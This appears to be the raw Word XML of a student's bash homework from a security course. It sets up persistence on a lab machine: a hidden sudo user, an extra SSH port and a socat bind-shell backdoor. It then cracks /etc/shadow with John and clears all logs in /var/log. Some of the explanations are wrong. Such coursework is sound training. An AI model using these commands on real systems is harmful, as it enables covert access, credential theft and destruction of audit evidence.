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20E8B" w14:textId="1114E0A4" w:rsid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569CD6"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Menlo" w:eastAsia="Times New Roman" w:hAnsi="Menlo" w:cs="Menlo"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="569CD6"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>#Berlys Deardorff</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68FAAB8C" w14:textId="39AC0478" w:rsid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b/>
          <w:bCs/>
          <w:color w:val="569CD6"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Menlo" w:eastAsia="Times New Roman" w:hAnsi="Menlo" w:cs="Menlo"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="569CD6"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>#March 30, 2020</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52E1BD6D" w14:textId="2BF6A5C4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b/>
          <w:bCs/>
          <w:color w:val="569CD6"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">## Submission for </w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:r w:rsidRPr="004869B5">
        <w:rPr>
          <w:rFonts w:ascii="Menlo" w:eastAsia="Times New Roman" w:hAnsi="Menlo" w:cs="Menlo"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="569CD6"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Unit 6 Advanced Bash Homework</w:t>
      </w:r>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p w14:paraId="392CD54A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7FF57CB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Create a secret user named </w:t>
      </w:r>
      <w:r w:rsidRPr="004869B5">
        <w:rPr>
          <w:rFonts w:ascii="Menlo" w:eastAsia="Times New Roman" w:hAnsi="Menlo" w:cs="Menlo"/>
          <w:color w:val="CE9178"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>`</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004869B5">
        <w:rPr>
          <w:rFonts w:ascii="Menlo" w:eastAsia="Times New Roman" w:hAnsi="Menlo" w:cs="Menlo"/>
          <w:color w:val="CE9178"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>sysd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004869B5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>. Make sure this user doesn't have a home folder created.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69D7CD67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sudo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adduser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--system --no-create-home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sysd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="16EFCD46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A2BCA4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Give your secret user a password. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="662B9A9F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sudo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passwd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sysd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="31D7A4B2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>password: student</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38D61FD3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8FAF5B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>Give your secret user a system UID &lt; 1000.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6846F765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id -u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sysd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UID= 111</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="058DC685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059437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>Give your secret user the same GID</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1013C8CA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id -g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sysd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GID= 111</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="620AB9CF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0871E87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Give your secret user full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sudo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access without the need for a password.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AAB0332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sudo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nano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/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etc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sudoers</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="3DA6936B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>line added at the bottom of the text:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A724C2F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sysd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ALL=(</w:t>
      </w:r>
      <w:proofErr w:type="gram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ALL:ALL</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="004869B5">
        <w:rPr>
          <w:rFonts w:ascii="Menlo" w:eastAsia="Times New Roman" w:hAnsi="Menlo" w:cs="Menlo"/>
          <w:color w:val="D4D4D4"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>) NOPASSWD:ALL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DE17885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DD9712A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Test that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sudo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access works without your password</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79D732D8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tested with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sudo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passwd root and it did not prompt me for a password</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FC67976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C2E7A6A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>```bash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E1AE01D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>Your BASH commands go here</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1814ADCD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``` </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C5C4F49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C5A9E1B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b/>
          <w:bCs/>
          <w:color w:val="569CD6"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">## Allow </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004869B5">
        <w:rPr>
          <w:rFonts w:ascii="Menlo" w:eastAsia="Times New Roman" w:hAnsi="Menlo" w:cs="Menlo"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="569CD6"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>ssh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004869B5">
        <w:rPr>
          <w:rFonts w:ascii="Menlo" w:eastAsia="Times New Roman" w:hAnsi="Menlo" w:cs="Menlo"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="569CD6"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> access over port 2222.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B702B94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944A855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sudo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nano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/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etc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ssh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>/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ssh_config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</w:p>
    <w:p w14:paraId="29FA7702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>added Port 2222 underneath #Port 22</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08B44F10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0849C94B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>Note the IP address of this system:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11BC09BB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192.168.42.125</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75CE0959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Exit the root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accout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>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C4980EE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If you are in root, command is exit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AE4365B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SSH to the machine using your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sysd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account and port 2222</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1005F955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ssh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student@192.168.42.125 -p 2222</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="503AF52A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Use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sudo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to switch to the root user</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00DC2A72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sudo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su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root</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19551741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069E929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b/>
          <w:bCs/>
          <w:color w:val="569CD6"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">### Create a backdoor with </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004869B5">
        <w:rPr>
          <w:rFonts w:ascii="Menlo" w:eastAsia="Times New Roman" w:hAnsi="Menlo" w:cs="Menlo"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="569CD6"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>socat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="2A22B95A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Install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socat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="112D7FB3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apt -get install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socat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="1988ACE1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Run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Socat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command in the background</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B5CE5B8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</w:t>
      </w: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socat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TCP4-Listen:</w:t>
      </w:r>
      <w:proofErr w:type="gram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3177,fork</w:t>
      </w:r>
      <w:proofErr w:type="gram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EXEC:/bin/bash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25E57D3E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Explain each part of the </w:t>
      </w:r>
      <w:r w:rsidRPr="004869B5">
        <w:rPr>
          <w:rFonts w:ascii="Menlo" w:eastAsia="Times New Roman" w:hAnsi="Menlo" w:cs="Menlo"/>
          <w:color w:val="CE9178"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>`</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004869B5">
        <w:rPr>
          <w:rFonts w:ascii="Menlo" w:eastAsia="Times New Roman" w:hAnsi="Menlo" w:cs="Menlo"/>
          <w:color w:val="CE9178"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>socat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004869B5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command:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70026C3E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tcp4-LISTEN listening for ipv4 instead of ipv6</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27FF739F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3177 port it is listening to</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E036039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fork makes a copy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="328F2CCC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EXEC:/bin/bash making a file and putting it into that path</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39B64987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Exit the SSH session</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="212F9B75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Exits</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A6BA20F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Test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socat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connection from your local machine</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E34E906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socat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STDIO TCP4:192.168.42.125:3177</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EDC6145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Close the </w:t>
      </w:r>
      <w:r w:rsidRPr="004869B5">
        <w:rPr>
          <w:rFonts w:ascii="Menlo" w:eastAsia="Times New Roman" w:hAnsi="Menlo" w:cs="Menlo"/>
          <w:color w:val="CE9178"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>`</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004869B5">
        <w:rPr>
          <w:rFonts w:ascii="Menlo" w:eastAsia="Times New Roman" w:hAnsi="Menlo" w:cs="Menlo"/>
          <w:color w:val="CE9178"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>socat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004869B5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connection.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="478C88F4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 </w:t>
      </w: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Exit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="756EE043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99E728F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b/>
          <w:bCs/>
          <w:color w:val="569CD6"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>## Crack _all_ the passwords</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E9DBA7C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Ssh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back to the system using your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sysd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account</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5407D50D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ssh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sysd@192.168.42.125 -p 2222</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B8541CB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Use John to crack the entire /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etc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>/shadow file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5239DC11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cp /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etc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>/shadow ~/shadow.txt - copies everything from shadow to shadow.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10BC516B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unshadow shadow.txt &gt; passwords.txt - </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="238C3629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john passwords.txt cracked the passwords</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="550696E3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8D7740E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b/>
          <w:bCs/>
          <w:color w:val="569CD6"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>## Cover your tracks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C8C2502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Use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socat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and a for loop to clear all system logs.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2774BB88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6796E6"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>-</w:t>
      </w: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for log in $(ls /var/log); do echo '' &gt; /var/log/${log</w:t>
      </w:r>
      <w:proofErr w:type="gram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} ;done</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="444B2959" w14:textId="77777777" w:rsidR="004869B5" w:rsidRPr="004869B5" w:rsidRDefault="004869B5" w:rsidP="004869B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4869B5">
        <w:rPr>
          <w:rFonts w:ascii="Menlo" w:eastAsia="Times New Roman" w:hAnsi="Menlo" w:cs="Menlo"/>
          <w:color w:val="D4D4D4"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>socat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004869B5">
        <w:rPr>
          <w:rFonts w:ascii="Menlo" w:eastAsia="Times New Roman" w:hAnsi="Menlo" w:cs="Menlo"/>
          <w:color w:val="D4D4D4"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> is still running during the for loop</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13CF9D13" w14:textId="77777777" w:rsidR="004869B5" w:rsidRDefault="004869B5"/>
    <w:sectPr w:rsidR="004869B5" w:rsidSect="00D25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9B5"/>
    <w:rsid w:val="004869B5"/>
    <w:rsid w:val="00D2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4820"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{DA1B63D7-D2D1-D343-BC2E-1D697DC16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476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6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324</Words>
  <Characters>1847</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>15</Lines>
  <Paragraphs>4</Paragraphs>
  <ScaleCrop>false</ScaleCrop>
  <Company/>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>2167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Deardorff, Berlys Y. (Student)</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Deardorff, Berlys Y. (Student)</cp:lastModifiedBy>
  <cp:revision>1</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2020-03-31T02:56:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2020-03-31T02:58:00Z</dcterms:modified>
</cp:coreProperties>
</file>